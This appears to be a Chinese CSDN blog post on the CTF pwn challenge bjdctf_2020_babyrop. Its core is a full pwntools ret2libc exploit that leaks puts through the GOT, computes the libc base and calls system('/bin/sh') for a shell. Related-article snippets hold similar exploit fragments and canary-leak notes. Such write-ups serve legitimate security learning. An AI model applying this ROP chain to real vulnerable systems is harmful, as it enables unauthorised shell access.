bjdctf2020 babyrop

最新推荐文章于 2025-02-11 09:08:12 发布
原创 最新推荐文章于 2025-02-11 09:08:12 发布 · 364 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了BabyROP技术,通过具体实例演示了如何利用ROP(Return Oriented Programming)技巧进行漏洞利用。文章详细介绍了ROP gadget的查找、payload的构造过程,并展示了如何利用puts函数泄露地址,进而获取libc基址,最终实现shell的获取。适合对ROP技术感兴趣或希望深入了解漏洞利用机制的读者。 
from pwn import *
p = process('./bjdctf_2020_babyrop')
libcelf = ELF('./libc-2.23.so')
pop_rdi_ret = 0x0000000000400733
pop_rsi_r15_ret = 0x0000000000400731
pltputs = 0x00000000004004E0
main = 0x00000000004006AD
gotputs = 0x0000000000601018
payload = 'a' * 40 + p64(pop_rdi_ret) + p64(gotputs) + p64(pltputs) + p64(pop_rdi_ret) + p64(0) + p64(main) 
p.recvuntil("Pull up your sword and tell me u story!\n")
p.sendline(payload)
realputs = u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(realputs))
libcbase = realputs - libcelf.symbols['puts']
log.success(hex(libcbase))
system = libcbase + libcelf.symbols['system']
binsh = libcbase + libcelf.search('/bin/sh').next()
p.recvuntil("Pull up your sword and tell me u story!\n")
payload = 'a' * 40 + p64(pop_rdi_ret) +p64(binsh) + p64(system)
p.sendline(payload)
p.interactive()
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 3627
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
bjdctf_2020_babyrop2
最新发布
2301_80245691的博客
09-24 297
bjdctf_2020_babyrop2漏洞利用分析》 该题目考察64位程序中的ROP攻击技术。通过分析发现程序存在两个关键函数:gift函数可泄露栈金丝雀值,vuln函数存在栈溢出漏洞。攻击步骤如下: 利用格式化字符串漏洞"%7$p"泄露金丝雀值 构造ROP链,先覆盖金丝雀后控制返回地址 通过puts泄露libc地址,计算system和/bin/sh的真实地址 二次溢出调用system("/bin/sh") 关键点在于正确处理金丝雀机制,利用ret指令对齐栈地址,
bjdctf_2020_babyrop
u014377094的博客
01-25 1205
新手向解释
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 508
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 897
bjdctf_2020_babyrop
NSSCTF Pwn [BJDCTF 2020]babyrop2 题解
qq_33348179的博客
02-11 306
可以看到canary距离输入的字符串8字节 离rbp也是8个字节。得到了canary之后,就是ret2libc的流程了。下载 checksec exeinfo。可以看到有格式化字符串漏洞和栈溢出漏洞。64位 开启了canary和NX保护。利用格式化字符串漏洞泄露canary。canary的偏移为7;IDA64 查看函数。
bjdctf_2020_babyropbjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 718
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 615
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 686
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 369
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1749
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 876
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shell。ROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
BUUCTF(pwn)bjdctf_2020_babyrop
半岛铁盒的博客
03-31 525
from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',25519) elf=ELF('./2') main=0x4006ad rdi=0x400733 puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] payload='a'*(0x20+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.sendl...
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 570
bjdctf_2020_babyrop
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值